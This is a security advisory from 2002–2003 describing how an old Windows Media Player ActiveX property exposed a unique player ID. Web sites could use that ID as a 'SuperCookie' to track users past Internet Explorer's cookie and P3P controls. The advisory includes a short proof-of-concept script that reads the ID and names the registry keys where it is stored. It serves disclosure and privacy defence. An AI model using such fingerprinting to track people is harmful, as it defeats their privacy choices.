Internet Explorer SuperCookies bypass P3P and cookie controls


Richard M. Smith (rms@computerbytesman.com)
January 16, 2002 (Updated Sept. 23, 2003)

Introduction

There is a significant privacy problem with Internet Explorer because of a design flaw in the Windows Media Player (WMP). Using simple Javascript code on a Web page, a Web site can grab the unique ID number of the Windows Media Player belonging to a Web site visitor. This ID number can then be used just like a cookie by Web sites to track a user's travels around the Web.

However this ID number becomes a SuperCookie because it can be used by Web sites to bypass all of the new privacy and P3P protections that Microsoft has added to Internet Explorer 6 (IE6). IE6 ships today with all Windows XP systems. SuperCookies also work in all previous versions of Internet Explorer with all older versions of Windows.

Some of the other features of SuperCookies include:

After this article appeared, the SuperCookie problem was fixed by Microsoft in version 9 of the Windows Media Player by having all computers return the same cookie value of {3300AD50-2C39-46c0-AE0A-000000000000}.

Demo Page

I've set up a simple demo page that shows the issue:

http://www.computerbytesman.com/privacy/supercookiedemo.htm

Technical Details

When the Windows Media Player is installed on a computer, a unique ID number in the form of a GUID is assigned to the player. This ID number is stored in the Windows registry. The ActiveX interface to the Windows Media Player allows any JavaScript Program to retrieve the ID number using the property "ClientID".

The following example HTML and JavaScript code illustrates how easy it is to retrieve the ID number:

<OBJECT classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95" ID=WMP WIDTH=1 HEIGHT=1>
</OBJECT>

<script>
alert(document.WMP.ClientID);
</script>
Once the ID number is available to a JavaScript program, it can be sent back to a Web site either by appending it to the URL of a Web bug or storing it in regular Web browser cookie.

The actual WMP player ID number is stored in the Windows registry in these keys:

HKEY_CURRENT_USER\Software\Microsoft\Windows Media\WMSDK\General
string value "UniqueID"

or

HKEY_USERS\<user>\Software\Microsoft\Windows Media\WMSDK\General
string value "UniqueID"
If one of these keys is manually changed using REGEDIT, the demo page will show the new ID number. However, leaving the keys changed may break the Digital Rights Management (DRM) features of WMP.

In newer versions of WMP, there is an option on the "Tools | Options" Menu called "Allow Internet sites to uniquely identify your player". If this option is manually turned off, SuperCookies will also be disabled because Internet Explorer will generate a new player ID number each IE session.

SuperCookies also work in Netscape Navigator if the WMP plugin has been installed.

Recommendations for Microsoft

I originally notified Microsoft of this problem in March 2001. At that time there was no method of turning off SuperCookies except to uninstall WMP or disable JavaScript. Neither solution was very useful. In response to my message to Microsoft, they updated WMP to provide per-session player ID numbers when the WMP option "Allow Internet sites to uniquely identify your player" is unchecked. This update is described in this Microsoft security bulletin:
http://www.microsoft.com/technet/security/bulletin/MS01-029.asp
However, I do not believe that this is a workable solution for the majority of Windows users. Asking them to change an obscure WMP setting to fix a privacy leak in Internet Explorer is not a good policy. Instead, I believe, that the ClientID property in the WMP ActiveX should be permanently disabled by having it return an ID number of zero for all players.

Acknowledgements

Thanks to the many folks on the BugTraq and NTBugTraq mailing lists for helping sort out all of the technical details of this issue. Russ Cooper, moderator of NTBugTraq, was particular helpful. Andrew Schulman and David Martin also provided very useful feedback on the initial versions of this advisory.

Links